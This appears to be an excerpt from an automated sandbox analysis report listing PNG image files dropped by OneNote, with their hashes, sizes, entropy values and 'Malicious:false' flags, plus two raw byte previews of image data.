                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4744
                                                                                                                                                                                                          Entropy (8bit):0.6431669927931156
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:RaQW7FYyfB3h1RRXUnfLfXThlXBoOHKOBN802/8IBRujlw//0lweI/K98IjRujd:RaQW7FYyf9/UfL7hzoOpuedWf/KeV
                                                                                                                                                                                                          MD5:0F66F73D015D4FCF000A95716C69C51F
                                                                                                                                                                                                          SHA1:EF739488AB03A2AE0F4A12DB4FEAB4D1F2875EF3
                                                                                                                                                                                                          SHA-256:7BA091F2C9BD4BE28DC7226A48410EDD2ED2F97169E5C21E4F4B26BE7C341D5A
                                                                                                                                                                                                          SHA-512:8C42B672B7AAA2AC23A0EB7C3C65F78AFC3BBFFB1468AB4E8EDE1E5DCD7416F897E239A523FF6D251F965E2CC27B0CEBF0CF10D043BA61EB543844C439D64322
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
